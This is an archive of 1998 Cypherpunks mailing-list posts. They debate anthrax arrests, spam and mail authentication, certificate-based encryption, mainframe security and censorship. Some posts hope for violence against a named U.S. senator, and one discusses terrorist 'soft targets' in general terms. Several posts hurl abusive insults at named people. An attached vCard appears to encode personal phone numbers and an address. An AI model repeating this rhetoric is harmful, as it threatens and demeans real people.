expect from their government should FUD no longer suffice to control their
thought patterns. 

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 05:15:56 +0800
To: cypherpunks@Algebra.COM
Subject: What are the "Soft Targets"?
Message-ID: <v03102808b1124c48bbfa@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




Someone asked me what I meant by "soft targets," and what specifically some
of them are.

I won't provide a list here, lest I be tarred by the same "guilt by
association" brush the Las Vegans are facing in the media. ("The Army found
a map of the New York City subway system." Thoughtcrime.)

A "soft target" is a target of opportunity that is both:

-- almost impossible to defend

and

-- valuable for publicity purposes if attacked

Traditionally, examples have been public squares, train stations, hotel ,
etc.  When U.S.-sponsored terrorists blew up the Balogna, Italy train
station, they knew this would generate massive fear and backlashes against
the Left (whom the U.S. supported terrorists were pretending to
represent...cf. the info on Lucio Gelli, the strategy of tension, the P2
Lodge, Stefano Delle Chiaie, etc.). And when the Jewish terrorists in
Palestine wanted to make a point, they bombed the King David Hotel.

In the U.S., soft targets abound. These would typically be crowded,
downtown areas any of the 30 or 50 largest cities, but also various tourist
attractions and government facilities (though government facilities tend to
be "harder" targets, and so less likely).

With aerosol weapons, subways and indoor locations are more likely to be
targets.

Use your own judgment, but I choose to avoid any of the various soft
targets near me.

-Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 05:43:33 +0800
To: Declan McCullagh <cypherpunks@cyberpass.net
Subject: Re: SF Chronicle on Sen. Dianne Feinstein: "Feinstein Offline"
In-Reply-To: <Pine.GSO.3.95.980219125257.9768F-100000@well.com>
Message-ID: <v03102809b11253ad78b7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:53 PM -0800 2/19/98, Declan McCullagh wrote:

>Feinstein Offline
>Her law-and-order stance irks tech industry
>Jon Swartz, Chronicle Staff Writer
>Thursday,February 19, 1998

Or the version her innermost self expressed:

> In Feinstein's view, ``This whole information thing is moving so
> fast that one has to be sure that kids are protected,'' she said.
> ``I'm concerned when kids blow themselves up by building bombs (they
> learned to make) by reading things in the encyclopedia. There is a
> philosophy that anything goes. This is why I support the repeal of
> the First Amendment and prison terms for thought criminals."

She's a buffoon who is probably the first one who'll be sent to the wall if
there's ever a Second American Revolution.

As for her concern about Social Security numbers being posted online, did
it ever occur to her and her ilk that perhaps the problem is the widespread
use of SS numbers by increasing numbers of government agencies, by
requirements that banks use them, by requirements that motor vehicle
departments use them, and so on?

"Duh."

The solution is not a new set of laws to felonize information like this,
but the elimination of the SS number as a universal identifier. Far too
late for that, of course, but Fineswine's laws won't help anybody. In fact,
law enforcement will continue its abuse of SS numbers, its role in
falsifying records and official documents, and so on.

Let's try to be sure DiFi is in D.C. when Abu Nidal makes his move.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Eric J. Tune" <paladin@lvcablemodem.com>
Date: Fri, 20 Feb 1998 06:21:30 +0800
To: cypherpunks@cyberpass.net
Subject: Re: PLO censoring pro-Iraqi sentiments
Message-ID: <3.0.5.32.19980219140712.007bda40@pop3.lvcablemodem.com>
MIME-Version: 1.0
Content-Type: text/plain



>X-Sender: tcmay@mail.got.net
>Date: Thu, 19 Feb 1998 12:03:26 -0800
>To: Eric Cordian <emc@wire.insync.net>, cypherpunks@cyberpass.net
>From: Tim May <tcmay@got.net>
>Subject: Re: PLO censoring pro-Iraqi sentiments
>Sender: owner-cypherpunks@cyberpass.net
>Reply-To: Tim May <tcmay@got.net>
>X-Loop: cypherpunks@cyberpass.net
>
[SHIT REMOVED]

>This is why I cheered to see the U.S. gets its tail kicked in Somalia and
>have to retreat in disgrace. Alas, the U.S. planners just looked for
>another war, one we could "win," and they found a bombed out Bosnia to be
>the perfect place to "restore our dignity."
>
>Amerika the Fascist.
>
>--Tim May
>
>

You know Tim, I respect most of what you write, and I respect you in that
you have your own free will and opinions and the right to express them, but
what you have forgotten in your anarchistic ravings is that PEOPLE DIED IN
SOMALIA, including a personal friend of mine.  They were all somebody's
son, brother, and friend.  These soldiers went where they were ordered to
go, as befits a soldier, and tried to do the job they were given and
accomplish the mission, and for that EVERY ONE OF THEM DESERVES   Y O U R
RESPECT.  I am quite sure the vast majority of them thought it was patently
stupid to go to Somalia in the first place, but a soldier follows orders,
legal ones, and tries to get the job done regardless of personal feelings.

The next time you "cheer to see the U.S. gets its tail kicked", why don't
you think about the American troops who lost their lives or were maimed, or
who were doing something they may have been personally and morally against,
but they chose to be professional soldiers, and instead of displaying
cowardice, they tried to do what was asked of them.  Think of the innocent
civilians who inevitably die in the conflicts started by the megalomaniacs
like Saddam Hussein.  If you want to blame someone, and you bellow
endlessly in every letter you write about blaming someone, why don't you
blame the politicians who start the wars, who run the countries and step
all over their own people, instead of the people who are made to do the
dirty work?

Your "cheering" was a blatant slap in the face to anyone who has ever
served in uniform, and my only hope is that you will think about who should
really deserve your ire next time before you so recklessly blurt it out.

A lot of people like what you have to say most of the time, including me,
but with the right to our freedom of speech comes a responsibility to speak
wisely, which is something we could all strive to be better at, don't you
think?

Eric Tune






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <Hua@teralogic-inc.com>
Date: Fri, 20 Feb 1998 07:13:42 +0800
To: cypherpunks@cyberpass.net
Subject: RE: Anthrax--The Horsemen are Riding
Message-ID: <413AC08141DBD011A58000A0C924A6D50D7DA2@MVS2>
MIME-Version: 1.0
Content-Type: text/plain



Relax ... Tim is not condoning this guy's behavior.

The real issue is why NOW?  It's just a bit coincidental, don't you
think, that someone so blatantly advertises his intimate relationships
with biological weapons for years is just now suddenly being arrested?
In politics, timing is everything.

I am not the least bit sorry for this guy if he really possessed
anything, but I'm just a bit skeptical that this is just another routine
domestic terrorism arrest.

Ern

	-----Original Message-----
	From:	Anonymous [SMTP:nobody@REPLAY.COM]
	Sent:	Thursday, February 19, 1998 1:35 PM
	To:	cypherpunks@cyberpass.net
	Subject:	Re: Anthrax--The Horsemen are Riding


	Yet another wrong call by Tim "Chicken Little" May:

	>CNN is reporting a news flash, with few details, about two men
being
	>arrested in Las Vegas for making or possessing or planning to
make
	>anthrax. Details should be emerging, but I have a hunch it's a
witch
	>hunt, an invocation of the Four Horsement, to drum up support
for
	>Clinton's Dirty Little War.

	Nonsense.  This has nothing to do with Saddam.  These men are
from the
	Aryan Nation, a militia group (and one which Tim secretly
supports, being
	a strong believer in Aryan superiority).  No wonder he is upset,
when
	his favorite racists are shown to be just another bunch of
terrorists,
	willing to kill innocents to promote their hate-filled cause.

	>"Find us some jimbells we can show to the American public as
proof that
	>an undeclared, unsupported war with Iraq is justified."

	How incoherent can you get?  How on earth can terrorism by the
militias
	be related to the war in Iraq?  Jeez, what an idiot.

	>Wanna bet they also bring crypto in this media circus?

	This would be funny if it weren't so sad.  And you guys really
_respect_
	someone who would write this nonsense?

	It's a sad story when the one who is supposed to be the brains
of the
	group is this stupid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Henri La Bouche <hedgehog@anon.efga.org>
Date: Fri, 20 Feb 1998 04:11:21 +0800
To: cypherpunks@Algebra.COM
Subject: The danger of certificates
Message-ID: <199802192003.PAA11771@server1.efga.org>
MIME-Version: 1.0
Content-Type: text/plain




IMHO there is a serious situation creeping up that I have not seen much attention on. That is the use of certificates to encrypt e-mail. I think these are two entirely separate subjects and unless the distinction is made and people are made to see it strong encryption will be next to useless.

If I may draw an analogy (albeit flawed <g>). Using a certificate to sign or encrypt a message is akin to notarizing a document. Using strong encryption is akin to putting snail mail in an envelope before sending. To have to notarize every piece of mail you send, or to be required to go to the post office and show ID in order to send mail would be a gross invasion of privacy and completely unacceptable. Yet this is what is done when using certificates to encrypt e-mail.

Currently this use of certificates is not widespread, but if any lesson is to be learned from the "browser wars" is that if you give it away people will use it regardless of quality. And in America especially, if something requires brains or intelligence to use you know right off that the general public will not accept it. As e-mail becomes more and more the standard it will be easy to whip the populace into a frenzy regarding "privacy" and spam then provide the simple and easy method of using certificates as a standard.

Let's put on the black hat for a moment and create a plan. We want to snooker the public into believing it has security through strong encryption and yet we have the ability to track connections and communications. Further we would like to get a net gain of intel, not just replace the current system with something new.

The primary goals would be
1. Knock out any competing encryption system.
2. Provide a system that is apparently strong but is not.

The best way to defeat number one is to give away number two (pun intended).

The specs for such a system would be:
1. A backdoor or key escrow or other method to easily decrypt the information sent.
2. A means to trace all messages back to the actual originator.
3. A means to know who is the true recipient.
4. User friendly (no-brainer).
5. It must provide benefits above and beyond encryption and digital signatures.
6. Acceptable to the general public.

The simplest method of creating key escrow is to have a single source for issuing keys. If people are unable to create their own keys then there will be no problem with having to break unknown keys. To make this acceptable to the populace there has to be an apparent benefit. If the keys are issued by a "trusted" authority who supposedly takes great pains to verify identity before issuing a key, then the people don't have to think or be bother to look for deceit. The authority will be there to ensure it never happens.

This system also provides traceability of originator and recipient.

To make it user friendly, make it password free, fully integrated into the e-mail client and fully transparent to the user.

Additional benefits could be the noted above "trusted" authority factor as well as whipping up a frenzy about "hackers" reading your mail and doing horrible things, which will be prevented if your just use our encryption. Also "faster" protocols can be invented that whisk certificate encrypted mail through the internet faster and more reliably. Use of certificates can eliminate spam, simply filter out all mail that is not encrypted with one of our certificates, after all, if someone doesn't use our certificate then they must have something to hide.

Making it acceptable would require that it appear to be not controlled by the government and then run a PR campaign selling it. First off have a few large corporations back it, have the certificates issued by an apparently private corporation and finally have athlete and movie star endorsements, i.e. "Got Encryption".

The political deviants who refuse to use this system will be easy to isolate and target.

Henri
<hedgehog@anon.efga.org>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunder <sunder@brainlink.com>
Date: Fri, 20 Feb 1998 04:34:51 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Is spam really a problem?
In-Reply-To: <199802181733.SAA26244@basement.replay.com>
Message-ID: <34EC9489.F44B070B@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
>
> But *many* things eat up our valuable time. Doesn't mean government action
> is the answer.

Show me one place in the email you replied to where I mention that I would
favor
any sort of governmental action in terms of passing anti-spam laws.  I did
mention
contracts between ISP's and subscribers at one point, but did you see anything
about someone passing laws?
 
> If you use ISDN and pay minute charges to download an article from me, for
> example, and you feel it was a waste of your valuable time, should my
> article be illegal?

If I am forced to pay for something that I don't want to buy, it is a theft
of my money.  If you send me garbage without my asking for it, then you're
wasting my money.  If I subscribe to a mailing list and don't want to see
your messages, it's a different story since I have to take other steps to
not see what you post.  In other words, in one case you are targetting me
with spam, in the other, I want to receive cypherpunks minus one user, but
that user isn't directly targetting me.
 
> If someone sees your name somewhere and does the same thing (sends you a
> letter), should this be illegal?

Ditto as the response above.  I will accept any non commercial, non moral
pushing message.  i.e. there are those who like my home page and email me
to tell me so.  There are those who hate it and tell me so.  There are
those who ask for help, or offer help.  No problemo there.

But there are those who see the upside down pentagram and send me email
stating I'm in the wrong religion.  Thems I consider spam because they
try to pursuade me to their belief system.
 
> (I threw this last point in because some have argued that there is an
> implicit agreement that mail on a mail exploder will not be objected to, as
> it fits the charter, blah blah. So I removed this implicitness by speaking
> of someone who writes a letter.)

Makes no difference what you throw in.  A mail exploder that auto subscribes
everyone on the planet without their consent IS a source of spam.  A mail
exploder that sends email to those who wish to receive it is not because there
was consent.
 
> If _content_ is not a criterion for spam, as Costner and others have noted,
> then "wasting Ray's time" is even less of a criterion for what spam is.

Spam is unsolicited broadcasts.   Pure and simple.  If you spam me with
a scheme to make you money, it's spam.  If you spam me with "Jesus loves you"
it's a spam.  If you spam me with chain letters promising whatever or warning
of great virus plages, it's still spam.  Content is a valid criterion for spam
and so is consent. It's the unwanted content of these messages that makes
them unwanted.  If they were useful to the recipient, they wouldn't be unwanted
hence would not be spam.

Problem is every dickhead who buys into the "Make Money Fast on the Net
By Spamming" theory has dollar signs in his eyes and thinks his message
is the most valuable, most useful, most cuddly lovely bit of info on the
planet and that he's doing everyone a service by shoving it down their 
unwiling throats.
 
> Look, there's just not going to be a simple government answer to "unwanted
> communications" that doesn't do serious damage to our liberties.

I posted a very nice technological way to deter spam, and you go and read
governmental interfearence in it.  READ the message you reply to before you
respond to it.
 
> Technological/economic approaches are the only way to go.

No shit.  And that's what I posted earlier.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <Hua@teralogic-inc.com>
Date: Fri, 20 Feb 1998 07:42:15 +0800
To: "'Jim Choate'" <cypherpunks@ssz.com
Subject: RE: Anthrax--The Horsemen are Riding (fwd)
Message-ID: <413AC08141DBD011A58000A0C924A6D50D7DA3@MVS2>
MIME-Version: 1.0
Content-Type: text/plain



If the guy was after visibility, yes, then I would agree with you (re:
"prime time").

Of course, it could also just be monumental stupidity on his timing (to
confirm the FBI's "dumb criminal" model).

Ern

	-----Original Message-----
	From:	Jim Choate [SMTP:ravage@ssz.com]
	Sent:	Thursday, February 19, 1998 3:18 PM
	To:	cypherpunks@ssz.com
	Subject:	RE: Anthrax--The Horsemen are Riding (fwd)


	Forwarded message:

	> From: Ernest Hua <Hua@teralogic-inc.com>
	> Subject: RE: Anthrax--The Horsemen are Riding
	> Date: Thu, 19 Feb 1998 14:51:32 -0800

	> The real issue is why NOW?  It's just a bit coincidental,
don't you
	> think, that someone so blatantly advertises his intimate
relationships
	> with biological weapons for years is just now suddenly being
arrested?
	> In politics, timing is everything.
	> 
	> I am not the least bit sorry for this guy if he really
possessed
	> anything, but I'm just a bit skeptical that this is just
another routine
	> domestic terrorism arrest.

	There is one other potential reason why 'now'. The guy doing the
deed
	figured it was a prime time to strike.



____________________________________________________________________
	   |
|
	   |            When a man assumes a public trust, he should
|
	   |            consider himself public property.
|
	   |
|
	   |                                      Thomas Jefferson
|
	   |
|
	   |
| 
	   |            _____                             The Armadillo
Group   |
	   |         ,::////;::-.                           Austin, Tx.
USA     |
	   |        /:'///// ``::>/|/
http://www.ssz.com/   |
	   |      .',  ||||    `/( e\
|
	   |  -====~~mm-'`-```-mm --'-                         Jim
Choate       |
	   |
ravage@ssz.com     |
	   |
512-451-7087      |

|____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Fri, 20 Feb 1998 05:01:36 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <241e4ef7f128aa790d464cb6e45d4dd2@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



Lately, anonymous messages sent to the list
with Replay's Web-based remailer have not
been getting through - anyone know if one or
more of these remailers (efga, replay, ml, 
obscura, cypherpunks.ca) are down?

In case my last message doesn't get through,
I'm looking for info on how one can create and
use a persistent Nym. I looked and can't find
info on how to do this anywhere (besides the
creation of a "free" email account somewhere).
Can any cypherpunks help?

Thank you.


From owner-cypherpunks@Algebra.COM Sun Feb 22 01:03 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA19829 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 01:03:36 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id LAA23950
	for cypherpunks-outgoing; Sat, 21 Feb 1998 11:55:16 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id LAA23938
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 11:55:09 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id IAA15818; Sat, 21 Feb 1998 08:57:21 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id IAA15814 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 08:57:09 -0800 (PST)
Received: from toad.com (toad.com [140.174.2.1]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id IAA01552 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 08:51:51 -0800 (PST)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id IAA08530 for cypherpunks-unedited-outgoing; Sat, 21 Feb 1998 08:53:56 -0800 (PST)
Received: from kali.brainlink.com (kali.brainlink.com [206.127.58.27]) by toad.com (8.7.5/8.7.3) with ESMTP id MAA09177 for <cypherpunks@toad.com>; Thu, 19 Feb 1998 12:36:13 -0800 (PST)
Received: from brainlink.com (sunder.pfmc.net [204.254.224.80])
          by kali.brainlink.com (Post.Office MTA v3.1.2
          release (PO203-101c) ID# 0-43838U2500L250S0) with ESMTP
          id AAA28642; Thu, 19 Feb 1998 15:41:28 -0500
Message-ID: <34EC98A6.363D0100@brainlink.com>
Date: Thu, 19 Feb 1998 15:40:06 -0500
From: sunder <sunder@brainlink.com>
Organization: SunderNET.com
X-Mailer: Mozilla 4.03 [en] (WinNT; I)
MIME-Version: 1.0
To: Information Security <guy@panix.com>
CC: cypherpunks@toad.com
Subject: Re: Is spam really a problem?
References: <199802182107.QAA00482@panix2.panix.com>
Content-Transfer-Encoding: 7bit
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset=us-ascii
Content-Length: 3007


Information Security wrote:

>    >   From sunder@brainlink.com Wed Feb 18 15:58:46 1998
>    >
>    >   Anonymous wrote:
>    >   >
>    >   > I see discussion of spam here and everywhere on
>    >   > the net. But who finds it a *real* problem, and
>    >   > why?
> 
> Why are you asking the cypherpunks list?

I didn't. Anonymous did.  
 
>    >   There are nice technical solutions to this.  If sendmail didn't transport
>    >   things unauthenticated it could be done, but at a cost in CPU cycles on mail
>    >   servers:
>    >
>    >   Have every sendmail server use a PK scheme to talk to every other
>    >   server and authenticate the connection.  Have every sendmail server accept
>    >   mail only from those whose key is verified.
> 
> Nonsense.
> 
> We (NANA) already know where spam comes from,
> and when we complain about it, they are terminated.

Until someone else gets a throw away $10 account and uses it to 
spam, right?  By the time you track'em down, they already gave up
that account.  All ISP's do is to delete the spamming account, which
the spammer doesn't care about anyway.  So you achive nothing.

Further one can generate fake headers and you would not know exactly where
it comes from, though you could have some idea since it would be one of
many sites it was relayed from.  One could send messages from an ISP
that doesn't mind spammers who won't help you track down the bitch that
just slimed your machine, etc.

 
> PK authentication would change nothing.
> 
> Show a single spam with a forged IP address.

IP addresses won't be forged, but one could send
a mail with extra Recieved-By: headers, etc.
 
> PK authentication would only lead us down the
> road of everyone being tattooed with barcodes
> of our own making - and incredibly dumb idea.
> 
> It would be like requiring a smart card for Internet access.

Bullshit.  PK auth with a central repository would be Big Brotherish.
Having each user gen their own PK pair is what I suggested. That
would allow anon users to have persistant (or even throw away)
identities, but prevent Joe Spambitch from telnetting to port 25
and spamming that way.

Even if Joe Spambitch does gen PK pairs and uses them, he can't
gen a pair for every message he sends, the recipient servers won't
recognize his PK pair and might have been instructed to block messages
from bad (and possibly unknown PK's), or at least refuse to relay
messages from unknown PK's.  Relaying is a big problem.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Roger J. Jones" <Roger.Jones@IBPINC.com>
Date: Fri, 20 Feb 1998 06:07:57 +0800
To: cypherpunks@cyberpass.net
Subject: Mainframe solutions
Message-ID: <09B2B857068ED11182284000000018980C5C@IBPNT000>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3989.1071713778.multipart/mixed"

--Boundary..3989.1071713778.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Having looked at this path I suggest that the article is misleading. No
one moves SAP to a mainframe. What you do is move the DBMS from Oracle
under UNIX (the normal implementation for 1000 concurrent users or less)
to Oracle or more likely DB2 on the mainframe.

Also curious about how mainframe security is 2 years ahead of Unix
and/or NT. There is almost no security on a mainframe unless you add a
package such as ACF2 or TopSecret. Neither are easy to administer, easy
to audit, nor do either have anything to do with application security.
They monitor use of files, terminals and the like. As far as I know,
there is no package that can intercept the PSW being returned after a
system call in the System (vice User) state. (Being in system state on a
mainframe is like being root in UNIX) I assure you that in the millions
of lines of code, much over 25 years old, in the typical mainframe
operating system you don't have to wait long for the "right word"




--Boundary..3989.1071713778.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "Roger John Jones (E-mail).vcf"

QkVHSU46VkNBUkQKVkVSU0lPTjoyLjEKTjpKb25lcztSb2dlcjs7OwpGTjpS
b2dlciBKb2huIEpvbmVzIChFLW1haWwpCk9SRzpJQlAsIGluYy47ClRJVExF
OlNlbmlvciBWaWNlIFByZXNpZGVudApURUw7V09SSztWT0lDRTooNDAyKSAy
NDEtMjUyMwpURUw7SE9NRTtWT0lDRTooNzEyKSAyMzktMTg2NQpURUw7Q0VM
TDtWT0lDRTooNzEyKSAyNTItNTA2NgpURUw7Q0FSO1ZPSUNFOig3MTIpIDI1
MS00NDEwClRFTDtQQUdFUjtWT0lDRTooNzEyKSAyNzctNTU4MApURUw7V09S
SztGQVg6KDQwMikgMjQxLTM2NDgKQURSO1dPUks6Ozs0MDE3IEdsZW4gT2Fr
cyBCbHZkO1Npb3V4IENpdHk7SUE7NTExMDQ7VW5pdGVkIFN0YXRlcyBvZiBB
bWVyaWNhCkxBQkVMO1dPUks7RU5DT0RJTkc9UVVPVEVELVBSSU5UQUJMRTo0
MDE3IEdsZW4gT2FrcyBCbHZkPTBEPTBBU2lvdXggQ2l0eSwgSUEgNTExMDQ9
MEQ9MEFVbml0ZWQgU3RhdGVzIG9mIEFtZXJpY2EKQURSO0hPTUU6Ozs0MDE3
IEdsZW4gT2FrcyBCbHZkO1Npb3V4IENpdHk7SUE7NTExMDQ7VW5pdGVkIFN0
YXRlcyBvZiBBbWVyaWNhCkxBQkVMO0hPTUU7RU5DT0RJTkc9UVVPVEVELVBS
SU5UQUJMRTo0MDE3IEdsZW4gT2FrcyBCbHZkPTBEPTBBU2lvdXggQ2l0eSwg
SUEgNTExMDQ9MEQ9MEFVbml0ZWQgU3RhdGVzIG9mIEFtZXJpY2EKRU1BSUw7
UFJFRjtJTlRFUk5FVDpjeWJlckBpYnBpbmMuY29tClJFVjoxOTk4MDEzMFQx
ODE5NTFaCkVORDpWQ0FSRAo=
--Boundary..3989.1071713778.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bjrn" Karger <bkarger@yahoo.com>
Date: Fri, 20 Feb 1998 08:21:49 +0800
To: cypherpunks@Algebra.COM
Subject: Anthrax
Message-ID: <19980220000436.13373.rocketmail@send1d.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



Is it just coincidence that this scenario (crazy
Amerikans brewing biowarfare in their homes) was 
just discussed on Cypherpunks just days before the
attack?




_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunder <sunder@brainlink.com>
Date: Fri, 20 Feb 1998 05:30:22 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Is spam really a problem?
In-Reply-To: <199802181733.SAA26244@basement.replay.com>
Message-ID: <34ECA0D8.32CBABB5@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
 
> Ray has widened his definition of "spam" even more.

No, my definition is the same as it always was.  Maybe you didn't realize
how wide it was.
 
> You've mentioned that spam is theft. If the courts agree with you on your
> definition of what spam is, then pretty clearly the legal system gets
> invoked. (But to forestall any confusions in the courts, the anti-spam
> sentiment being discussed by Ray and many others is likely to lead to
> specific legislation. Sadly.)

It is my definition, if others agree, that's their business.  I'm not asking
the courts to do shit about it however.
 
> "Theft." Call the cops.

It is theft, and I do call the cops, or rather in this case the ISP's involved.
The problem is they can't do much as the messages are sent from throw away
accounts.

> So, your definition of spam has now been expanded to include someone who
> sends _you_ (you, not thousands, not tens of thousands) a message you don't
> care for.

Show me your spam filters.  Do you not have at least one individual's name
in that list whose messages you route to a folder of trash or delete outright?
I seem to recall that was the case quite a while back with a certain "Doctor".

Indeed, even you make decisions about what is or isn't spam based on WHO sends
it.  In this case, you, not thousands, not tens o thousands of others is making
a decision on what is or isn't spam because you don't care for it.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 08:44:41 +0800
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: SF Chronicle on Sen. Dianne Feinstein: "Feinstein Offline"
In-Reply-To: <v03102809b11253ad78b7@[207.167.93.63]>
Message-ID: <v0310280ab1127dda617c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:55 PM -0800 2/19/98, William H. Geiger III wrote:

>>She's a buffoon who is probably the first one who'll be sent to the wall
>>if there's ever a Second American Revolution.
>
>Third. We had a Second American Revolution and we lost.

You're quite right...I stand corrected.

Though in some sense it was a "secessionist movement," which is subtly
different from a revolution. As with Quebec, whose secession the USG
opposes. As with Kurdistan, whose secession the USG sometimes supports and
sometimes doesn't, depending on geopolitical calculations and on the party
in power. As with the Basque region, whose secession the USG emphatically
does not support, to the point of sending intelligence experts to Spain to
help crush the secessionists. As with the outlying regions of the former
Soviet Union, which the USG attempted to destabilize by dropping agents in,
assassinating politicians, etc.

--Tim May


Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Fri, 20 Feb 1998 01:10:35 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Barnes & Nobles indicted on child porno... [CNN]
In-Reply-To: <199802191523.JAA16425@einstein.ssz.com>
Message-ID: <19980219.163356.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980219:0923, in <199802191523.JAA16425@einstein.ssz.com>, 
    Jim Choate <ravage@ssz.com> toosed this gem of a bomb into our 
    subsconsiousness:

>>           NATION'S LARGEST BOOKSELLER CHARGED WITH CHILD PORNOGRAPHY
>>                                        
>>      February 18, 1998
>>      Web posted at: 10:28 p.m. EST (0328 GMT)
>>      
>>      MONTGOMERY, Alabama (AP) -- An Alabama grand jury indicted the
>>      nation's largest bookseller, Barnes & Noble, on child pornography
>>      charges involving the sale of books by noted photographers whose
>>      work includes pictures of nude children.
>>
    that means every nudist camp magazine trying to show happy families,    
    every news picture from Cannes, and the National Geographic, etc. are
    about to have a problem with this dumbfuck.
      
>>      State Attorney General Bill Pryor said Wednesday he started the
>>      grand jury investigation after receiving complaints about two books
>>      being sold at Barnes & Noble stores in Alabama: "The Age of
>>      Innocence" by French photographer David Hamilton and "Radiant
>>      Identities" by San Francisco photographer Jock Sturges.
>>      
    is this asshole about to run for US President or just governor of
    Alabama? sounds like he has high political ambitions and wants the
    endorsements of Robertson, Buchannan & the now-religious-zealot
    Donna Rice.

    somebody raid his house; bet he's an S-M freak or some other kind
    of pervert!

>>      The indictment accuses the New York-based company of disseminating
